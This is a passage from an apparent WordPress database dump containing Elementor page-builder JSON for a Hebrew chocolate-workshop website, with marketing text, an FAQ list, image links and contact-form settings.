\\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fbef1f5\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(678,148,'_elementor_version','0.4'),(682,149,'_wp_page_template','elementor_canvas'),(683,149,'_elementor_edit_mode','builder'),(684,149,'_elementor_data','[{\"id\":\"73f3a63e\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"63f1f80\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5713db43\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"57068ba8\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"596a5a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"26fa35fd\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4097a5fb\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"144a579e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd8148d\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"45e6d3a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"409d660c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"1e9c8239\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62e2de7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/kids-choclate.jpg\",\"id\":125},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b4fe8e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05d4\\u05d5\\u05d0 \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8? \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d5\\u05d9\\u05e6\\u05e8\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e2\\u05d1\\u05d5\\u05e8\\u05dd \\u05dc\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd? \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd? \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1? \\u05e8\\u05e7 \\u05ea\\u05d2\\u05d9\\u05d3\\u05d5 \\u05d5\\u05d4\\u05dd \\u05d9\\u05e7\\u05d1\\u05dc\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05de\\u05dc\\u05d0\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d4\\u05d9\\u05d9\\u05ea\\u05d4 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d9 \\u05e4\\u05e2\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05d4\\u05dd \\u05d4\\u05e7\\u05d8\\u05e0\\u05d9\\u05dd \\u05dc\\u05d3\\u05d1\\u05e8 \\u05e9\\u05d4\\u05dd \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd - \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3!<\\/p><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05de\\u05d0\\u05d6 \\u05d5\\u05de\\u05ea\\u05de\\u05d9\\u05d3 \\u05d4\\u05d9\\u05d4 \\u05d4\\u05de\\u05d0\\u05db\\u05dc \\u05e9\\u05e7\\u05d9\\u05e8\\u05d1 \\u05d1\\u05d9\\u05df \\u05d4\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d5\\u05d4\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05d9\\u05d4\\u05d9\\u05d5 \\u05e7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05e9\\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05dc\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9\\u05e6\\u05dc \\u05e9\\u05d4\\u05d9\\u05d4 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7 \\u05db\\u05dc \\u05d4\\u05d9\\u05d5\\u05dd. \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5 \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05e9\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d0\\u05dc \\u05ea\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05d6\\u05d5 \\u05e8\\u05d9\\u05e7\\u05d4 \\u05de\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05db\\u05d9 \\u05d2\\u05dd \\u05d0\\u05ea\\u05dd \\u05ea\\u05d9\\u05d4\\u05e0\\u05d5 \\u05d1\\u05e8\\u05de\\u05d5\\u05ea \\u05d4\\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05d5\\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05db\\u05e9\\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d5\\u05d1\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd. \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05db\\u05dd, \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05de\\u05e2\\u05d9\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05db\\u05da \\u05e9\\u05e0\\u05d4\\u05e0\\u05d5 \\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d4\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd.<\\/p><p><strong>\\u05db\\u05df, \\u05d2\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e2\\u05db\\u05e9\\u05d9\\u05d5 \\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8 \\u05dc\\u05db\\u05dd, \\u05d6\\u05d4 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e2 \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05d9\\u05d7\\u05d3 \\u05d0\\u05d9\\u05ea\\u05e0\\u05d5.\\u00a0<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40986278\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"69a8df27\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6999b663\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3ea5b73c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"17ab813e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"37c615a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7559efb1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d2\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea (\\u05d1\\u05d8\\u05d7 \\u05ea\\u05e8\\u05e6\\u05d5 \\u05e1\\u05d1\\u05d9\\u05d1\\u05d4 \\u05d8\\u05d1\\u05e2\\u05d9\\u05ea)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e2\\u05d3 \\u05db4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd \\u05d5\\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8\\u05d9\\u05dd \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d4\\u05dd \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05d9\\u05d0\\u05db\\u05dc\\u05d5, \\u05d4\\u05dd \\u05d2\\u05dd \\u05d9\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05de\\u05d7\\u05e8 \\u05de\\u05d4 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d9\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3, \\u05d6\\u05d4 \\u05d1\\u05e1\\u05d3\\u05e8 \\u05d2\\u05de\\u05d5\\u05e8, \\u05db\\u05de\\u05d4 \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5 - \\u05d9\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"694d95f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3e053522\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1da9ea90\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"21a55173\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ffb95ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6d919f4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"21da8938\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2960ba88\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 